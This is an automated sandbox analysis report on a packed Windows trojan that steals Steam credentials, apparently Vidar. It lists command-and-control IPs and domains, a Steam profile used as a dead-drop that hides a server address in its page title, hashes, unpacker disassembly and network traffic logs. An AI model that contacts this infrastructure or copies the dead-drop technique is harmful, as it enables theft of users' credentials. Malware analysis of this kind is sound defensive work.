          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          http://127.0.0.1:27060SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://arpdabl.zapto.org/DSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://steamcommunity.com/profiles/76561199747278259$SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.245.87.202 | unknown | Iran (ISLAMIC Republic Of) | 16322 | PARSONLINETehran-IRANIR | false
23.50.98.133 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1511546
Start date and time: 2024-09-15 18:28:30 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/1@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 41
• Number of non-executed functions: 75
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:30:06 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
188.245.87.202 | SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exe | Get hash | malicious | Vidar | Browse |
 | file.exe | Get hash | malicious | Vidar | Browse |
 | FE89Nae47k.exe | Get hash | malicious | Vidar | Browse |
 | 66b0ba4420669_main.exe | Get hash | malicious | Vidar | Browse |
 | 66b09f01e0030_dozkey.exe | Get hash | malicious | Vidar | Browse |
 | lem.exe | Get hash | malicious | Vidar | Browse |
23.50.98.133 | SecuriteInfo.com.Win32.Evo-gen.25283.30900.exe | Get hash | malicious | LummaC | Browse |
 | SecuriteInfo.com.FileRepMalware.25501.25264.exe | Get hash | malicious | LummaC | Browse |
 | SecuriteInfo.com.W32.PossibleThreat.3672.22783.exe | Get hash | malicious | LummaC | Browse |
 | SecuriteInfo.com.Win32.Malware-gen.17837.3001.exe | Get hash | malicious | LummaC | Browse |
 | SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exe | Get hash | malicious | Vidar | Browse |
 | SecuriteInfo.com.Win32.Malware-gen.17837.3001.exe | Get hash | malicious | LummaC | Browse |
 | Setup.exe | Get hash | malicious | LummaC | Browse |
149.154.167.99 | http://cryptorabotakzz.com/ | Get hash | malicious | Unknown | Browse | telegram.org/
 | http://cache.netflix.com.id1.wuush.us.kg/ | Get hash | malicious | Unknown | Browse | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
 | http://investors.spotify.com.sg2.wuush.us.kg/ | Get hash | malicious | Unknown | Browse | telegram.org/
 | http://bekaaviator.kz/ | Get hash | malicious | Unknown | Browse | telegram.org/
 | http://telegramtw1.org/ | Get hash | malicious | Unknown | Browse | telegram.org/?setln=pl
 | http://makkko.kz/ | Get hash | malicious | Unknown | Browse | telegram.org/
 | http://telegram.dog | Get hash | malicious | Unknown | Browse | telegram.dog/
 | LnSNtO8JIa.exe | Get hash | malicious | Cinoshi Stealer | Browse | t.me/cinoshibot
 | jtfCFDmLdX.exe | Get hash | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | Browse | t.me/cinoshibot
 | vSlVoTPrmP.exe | Get hash | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | Browse | t.me/cinoshibot
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    t.meSecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 149.154.167.99
                                    SecuriteInfo.com.Trojan.DownLoader47.29560.25432.19798.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    IM5Ov6yzm3CzKUodDTWqZSXo.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    aNj1aFSOxohqZwe847hVpx4K.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    https://bdh.vcj.mybluehost.me/website_8e3e3126/wp-admin/ANTIA/3dsece.phpGet hashmaliciousUnknownBrowse
                                    • 162.241.217.207
                                    https://bdh.vcj.mybluehost.me/website_8e3e3126/wp-admin/ANTIA/3dsec.phpGet hashmaliciousUnknownBrowse
                                    • 162.241.217.207
                                    https://bdh.vcj.mybluehost.me/website_8e3e3126/wp-admin/ANTIA/paiement.phpGet hashmaliciousUnknownBrowse
                                    • 162.241.217.207
                                    sntmr.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    vfdjg.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    steamcommunity.comSecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                    • 23.204.10.89
                                    SecuriteInfo.com.W32.PossibleThreat.3672.22783.exeGet hashmaliciousLummaCBrowse
                                    • 23.197.127.21
                                    SecuriteInfo.com.Win32.Evo-gen.25283.30900.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.FileRepMalware.25501.25264.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Win32.Evo-gen.16486.13246.exeGet hashmaliciousLummaCBrowse
                                    • 23.197.127.21
                                    SecuriteInfo.com.W32.PossibleThreat.3672.22783.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Win32.Malware-gen.17837.3001.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Trojan.PWS.Lumma.400.14864.1823.exeGet hashmaliciousLummaCBrowse
                                    • 23.197.127.21
                                    SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.FileRepMalware.25501.25264.exeGet hashmaliciousLummaCBrowse
                                    • 23.197.127.21
                                    arpdabl.zapto.orgSecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 0.0.0.0
                                    FortiClientOnlineInstaller.exeGet hashmaliciousVidarBrowse
                                    • 0.0.0.0
                                    qDqcWUzhA7.exeGet hashmaliciousVidarBrowse
                                    • 0.0.0.0
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 0.0.0.0
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 0.0.0.0
                                    file.exeGet hashmaliciousAmadey, VidarBrowse
                                    • 0.0.0.0
                                    a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 0.0.0.0
                                    66bddfc358668_stealc.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 0.0.0.0
                                    66bddfcb52736_vidar.exeGet hashmaliciousLummaC, VidarBrowse
                                    • 0.0.0.0
                                    dXaIbmbdKj.exeGet hashmaliciousVidarBrowse
                                    • 0.0.0.0
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TELEGRAMRUSecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 149.154.167.99
                                    SecuriteInfo.com.Trojan.DownLoader47.29560.25432.19798.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    SecuriteInfo.com.FileRepMalware.32268.950.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    SecuriteInfo.com.FileRepMalware.32268.950.exeGet hashmaliciousUnknownBrowse
                                    • 149.154.167.92
                                    ATH0000878718.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    • 149.154.167.220
                                    IM5Ov6yzm3CzKUodDTWqZSXo.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    aNj1aFSOxohqZwe847hVpx4K.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 149.154.167.99
                                    PjkFCWhi.exeGet hashmaliciousXWormBrowse
                                    • 149.154.167.220
                                    https://lkjkqklqsd.vercel.app/Get hashmaliciousUnknownBrowse
                                    • 149.154.167.220
                                    PARSONLINETehran-IRANIRSecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    https://www.soap2dayofficial.club/tgsfeGet hashmaliciousPhisherBrowse
                                    • 5.78.24.153
                                    PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                    • 5.78.41.174
                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtfGet hashmaliciousFormBookBrowse
                                    • 5.78.41.174
                                    x86.elfGet hashmaliciousMiraiBrowse
                                    • 178.169.26.221
                                    file.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    FE89Nae47k.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    66b0ba4420669_main.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    66b09f01e0030_dozkey.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    lem.exeGet hashmaliciousVidarBrowse
                                    • 188.245.87.202
                                    AKAMAI-ASUSSecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                    • 23.204.10.89
                                    SecuriteInfo.com.Win32.Evo-gen.25283.30900.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.FileRepMalware.25501.25264.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.W32.PossibleThreat.3672.22783.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Win32.Malware-gen.17837.3001.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Win32.Malware-gen.17837.3001.exeGet hashmaliciousLummaCBrowse
                                    • 23.50.98.133
                                    SecuriteInfo.com.Trojan.DownLoader47.29560.25432.19798.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 92.122.63.136
                                    http://thenonphonewfhnetwork.com/.rice/Get hashmaliciousUnknownBrowse
                                    • 2.19.68.136
                                    IM5Ov6yzm3CzKUodDTWqZSXo.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 23.192.247.89
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Trojan.PWS.Steam.37582.19133.23112.exeGet hashmaliciousVidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.Trojan.PWS.Steam.37481.30383.28482.exeGet hashmaliciousVidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.Win64.Malware-gen.12732.27825.exeGet hashmaliciousLatrodectusBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.Trojan.DownLoader47.29560.25432.19798.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.FileRepMalware.32268.950.exeGet hashmaliciousUnknownBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    SecuriteInfo.com.FileRepMalware.32268.950.exeGet hashmaliciousUnknownBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    file.exeGet hashmaliciousClipboard Hijacker, Raccoon Stealer v2Browse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    IM5Ov6yzm3CzKUodDTWqZSXo.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 23.50.98.133
                                    • 149.154.167.99
                                    No context
                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                    Category:dropped
                                    Size (bytes):34740
                                    Entropy (8bit):5.401683938260732
                                    Encrypted:false
                                    SSDEEP:768:ldpqme0Ih3tAA6WGFOfcDAJTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S+:ld8me0Ih3tAA6WGFOFJTBv++nIjBtPFP
                                    MD5:7783A3E7F18C8F1F12175D86EEF33652
                                    SHA1:3E285D8EFB7C74F335FC75F89B80548576DE82B7
                                    SHA-256:2631722BD721985597B5BA16FC6F037CB19E414B0B5F273855653CB868ABB32F
                                    SHA-512:2CD70E638D58A63EA7B2691B4A1D7F9E42D33791A44D6D5AE73B19B6A8F356E9271D2872C5BEA14AF1112BDE876CF8A07142210AA8833AD63FF84A02ACA16C67
                                    Malicious:false
                                    Reputation:low
                                    Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: gi_z2 https://188.245.87.202|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link h
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                    Entropy (8bit):7.936498076181626
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.66%
                                    • UPX compressed Win32 Executable (30571/9) 0.30%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe
                                    File size:70'144 bytes
                                    MD5:5a4ccccb90b0aaa3b248d4f0dde38823
                                    SHA1:be8f1d791a81696cd58e7f837a97aaea58eeb26a
                                    SHA256:b802eb0f4a10d4aecc9015ee86ddc9b1249212dcabc2ecb6aa97418d0de7722b
                                    SHA512:a75db1a19a6bc4f5a9c5437864cb01e5d139ef56365e3d320035fcfa65a713886f78a6fe2f3eb130e35bed1a25e4fe73d712b6e03ed6bb373e73a6c3a3cb7737
                                    SSDEEP:1536:T7os4AvSdEcNj56sWOr3H8+wMiT8om0QSnouy8:TBvSdEcHWswxQJ0Zout
                                    TLSH:A3630205C4330796DEEF14FD111F6B2E28369E5CC6A46D35EB2031B1E8B9FB6164C895
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M..!..`r..`r..`rf..r..`rf..r2.`r...r..`r...r..`r..as..`r..ar..`rf..r!.`rf..r..`rRich..`r................PE..L...kQ.f...........
                                    Icon Hash:00928e8e8686b000
                                    Entrypoint:0x645d70
                                    Entrypoint Section:UPX1
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66AA516B [Wed Jul 31 14:59:55 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:6d1ea1a7f4738511b305583a93ec33ea
                                    Instruction
                                    pushad
                                    mov esi, 00636000h
                                    lea edi, dword ptr [esi-00235000h]
                                    push edi
                                    mov ebp, esp
                                    lea ebx, dword ptr [esp-00003E80h]
                                    xor eax, eax
                                    push eax
                                    cmp esp, ebx
                                    jne 00007F8E94C1239Dh
                                    inc esi
                                    inc esi
                                    push ebx
                                    push 002439EAh
                                    push edi
                                    add ebx, 04h
                                    push ebx
                                    push 0000FD5Fh
                                    push esi
                                    add ebx, 04h
                                    push ebx
                                    push eax
                                    mov dword ptr [ebx], 00020003h
                                    push ebp
                                    push edi
                                    push esi
                                    push ebx
                                    sub esp, 7Ch
                                    mov edx, dword ptr [esp+00000090h]
                                    mov dword ptr [esp+74h], 00000000h
                                    mov byte ptr [esp+73h], 00000000h
                                    mov ebp, dword ptr [esp+0000009Ch]
                                    lea eax, dword ptr [edx+04h]
                                    mov dword ptr [esp+78h], eax
                                    mov eax, 00000001h
                                    movzx ecx, byte ptr [edx+02h]
                                    mov ebx, eax
                                    shl ebx, cl
                                    mov ecx, ebx
                                    dec ecx
                                    mov dword ptr [esp+6Ch], ecx
                                    movzx ecx, byte ptr [edx+01h]
                                    shl eax, cl
                                    dec eax
                                    mov dword ptr [esp+68h], eax
                                    mov eax, dword ptr [esp+000000A8h]
                                    movzx esi, byte ptr [edx]
                                    mov dword ptr [ebp+00h], 00000000h
                                    mov dword ptr [esp+60h], 00000000h
                                    mov dword ptr [eax], 00000000h
                                    mov eax, 00000300h
                                    mov dword ptr [esp+64h], esi
                                    mov dword ptr [esp+5Ch], 00000001h
                                    mov dword ptr [esp+58h], 00000001h
                                    mov dword ptr [esp+54h], 00000001h
                                    mov dword ptr [esp+50h], 00000001h
                                    Programming Language:
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [C++] VS2010 build 30319
                                    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2470b4 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x247000 | 0xb4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x247294 | 0xc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x235000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x236000 | 0x11000 | 0x10a00 | de6d77a2d892ec4ed99e2d6491aa7108 | False | 0.981687617481203 | ARC archive data, packed | 7.984077126914227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x247000 | 0x1000 | 0x400 | d1aec6795c1635e90fcb815e6185fd41 | False | 0.3818359375 | data | 3.115785366842726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x24705c | 0x56 | ASCII text, with CRLF line terminators | English | United States | 1.0232558139534884
DLL | Import
ADVAPI32.dll | GetUserNameA
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
msvcrt.dll | rand
ole32.dll | CoInitializeEx
OLEAUT32.dll | SysFreeString
SHELL32.dll | SHFileOperationA
SHLWAPI.dll |
USER32.dll | wsprintfW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-15T18:30:02.915417+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.12 | 49718 | 188.245.87.202 | 443 | TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 15, 2024 18:29:57.743235111 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:57.743274927 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:57.743494987 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:57.775052071 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:57.775077105 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:58.437298059 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:58.437464952 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:58.864470005 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:58.864495039 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:58.865560055 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:58.865653992 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.034697056 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.079396009 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429142952 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429176092 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429234982 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429296017 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.429323912 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.429342985 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.429403067 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.518125057 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.518204927 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.518294096 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.518311977 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.518335104 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.518431902 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.534771919 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.534871101 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.534888029 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.534945011 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.534945011 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.535711050 CEST49717443192.168.2.1223.50.98.133
                                    Sep 15, 2024 18:29:59.535728931 CEST4434971723.50.98.133192.168.2.12
                                    Sep 15, 2024 18:29:59.547319889 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:29:59.547369003 CEST44349718188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:29:59.547467947 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:29:59.547810078 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:29:59.547827005 CEST44349718188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:02.915318966 CEST44349718188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:02.915416956 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.916088104 CEST49718443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.916107893 CEST44349718188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:02.916914940 CEST49719443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.916970015 CEST44349719188.245.87.202192.168.2.12
                                    Sep 15, 2024 18:30:02.917057037 CEST49719443192.168.2.12188.245.87.202
                                    Sep 15, 2024 18:30:02.917320013 CEST49719443192.168.2.12188.245.87.202
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Sep 15, 2024 18:30:02.917332888 CEST | 443 | 49719 | 188.245.87.202 | 192.168.2.12
                                     Sep 15, 2024 18:30:06.276719093 CEST | 443 | 49719 | 188.245.87.202 | 192.168.2.12
